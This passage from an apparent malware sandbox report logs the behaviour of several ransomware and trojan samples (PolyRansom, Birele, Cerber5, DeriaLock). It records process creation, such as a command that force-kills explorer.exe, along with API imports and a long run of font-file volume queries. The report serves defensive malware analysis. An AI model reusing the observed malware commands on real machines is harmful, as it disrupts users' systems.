        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,4_2_04A4841D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A46FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,4_2_04A46FFE
        Source: Endermanch@Birele.exe, Endermanch@Birele.exe, 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
        Source: Endermanch@Birele.exe, 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: taskkill /F /IM explorer.exeProgram Managerh
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00404AB0
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetLocaleInfoA,3_2_0040536A
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetLocaleInfoA,3_2_0040536C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetLocaleInfoA,3_2_0040C568
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetLocaleInfoA,3_2_0040C51C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: GetLocaleInfoA,GetACP,3_2_0040D970
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeQueries volume information: C:\Users\user\Desktop\4W5dQXszUV.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
